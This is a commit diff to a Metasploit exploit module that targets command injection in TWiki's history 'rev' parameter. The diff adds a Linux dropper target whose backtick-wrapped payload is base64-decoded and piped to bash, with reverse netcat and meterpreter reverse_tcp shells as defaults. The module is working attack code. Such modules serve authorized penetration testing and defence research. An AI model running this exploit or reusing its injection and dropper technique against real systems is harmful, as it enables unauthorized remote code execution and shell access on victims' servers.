twiki_history: Add dropper target support

Author: g0tmi1k

modules/exploits/unix/webapp/twiki_history.rb

@@ -7,6 +7,7 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(
@@ -40,13 +41,39 @@ def initialize(info = {})
         'Privileged' => true, # web server context
         'Payload' => {
           'DisableNops' => true,
-          'BadChars' => '',
-          'Space' => 1024,
+          'BadChars' => '', # ' ',
+          'Space' => 1024
+        },
+        'Targets' => [
+          [
+            'Automatic (Unix Command)',
+            {
+              'Platform' => 'unix',
+              'Arch' => ARCH_CMD,
+              'Type' => :unix_cmd,
+              'DefaultOptions' => {
+                'PAYLOAD' => 'cmd/unix/reverse_netcat' # cmd/unix/php/meterpreter/reverse_tcp
+              }
+            }
+          ],
+          [
+            'Automatic (Linux Dropper)',
+            {
+              'Platform' => 'linux',
+              'Arch' => [ARCH_X86, ARCH_X64],
+              'Type' => :linux_dropper,
+              'CmdStagerFlavor' => [ 'echo', 'printf' ],
+              'DefaultOptions' => {
+                'PAYLOAD' => 'linux/x86/meterpreter/reverse_tcp'
+              }
+            }
+          ]
+        ],
+        'DefaultTarget' => 1,
+        'DefaultOptions' => {
+          'PrependFork' => true,
+          'MeterpreterTryToFork' => true
         },
-        'Platform' => [ 'unix' ],
-        'Arch' => ARCH_CMD,
-        'Targets' => [[ 'Automatic', {}]],
-        'DefaultTarget' => 0,
         'Notes' => {
           'Reliability' => UNKNOWN_RELIABILITY,
           'Stability' => UNKNOWN_STABILITY,
@@ -125,14 +152,26 @@ def check
     return Exploit::CheckCode::Vulnerable
   end
 
-  def exploit
+  def execute_command(cmd, _opts = {})
+    vprint_status("Executing command: #{cmd}")
+
     rev_url = normalize_uri(datastore['URI'], datastore['TWIKI_PAGE'])
     rev_url << '?rev='
     rev_url << datastore['TWIKI_REVISION'].to_s
     vprint_status("URI: #{rev_url}")
 
-    rev = '`' + payload.encoded + '`#'
-
+    rev = datastore['REVISION'].to_s
+    if payload_instance.respond_to?(:command_string)
+      vprint_status('Using command-based payload')
+      rev = "`" + cmd + "`"
+    elsif target['Type'] == :linux_dropper
+      vprint_status('Using platform payload (will perform base64 encoding)')
+      b64p = ::Base64.strict_encode64(cmd)
+      rev = "`echo${IFS}#{b64p}|base64${IFS}-d|bash`"
+    else
+      # Shouldn't get here
+      print_warning("Unknown payload: #{target['Type']}")
+    end
     uri = rev_url + Rex::Text.uri_encode(rev)
 
     vprint_status("Sending payload")
@@ -144,7 +183,18 @@ def exploit
     fail_with(Failure::Unknown, "Error sending exploit request") if res.nil?
     fail_with(Failure::Unknown, "Error with exploit request (HTTP #{res.code}, should be 200)") unless res.code == 200
     print_good("Exploit complete")
+  end
 
-    handler
+  def exploit
+    vprint_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
+
+    case target['Type']
+    when :unix_cmd
+      execute_command(payload.encoded)
+    when :linux_dropper
+      execute_cmdstager
+    else
+      fail_with(Failure::BadConfig, "Invalid target specified: #{target['Type']}")
+    end
   end
 end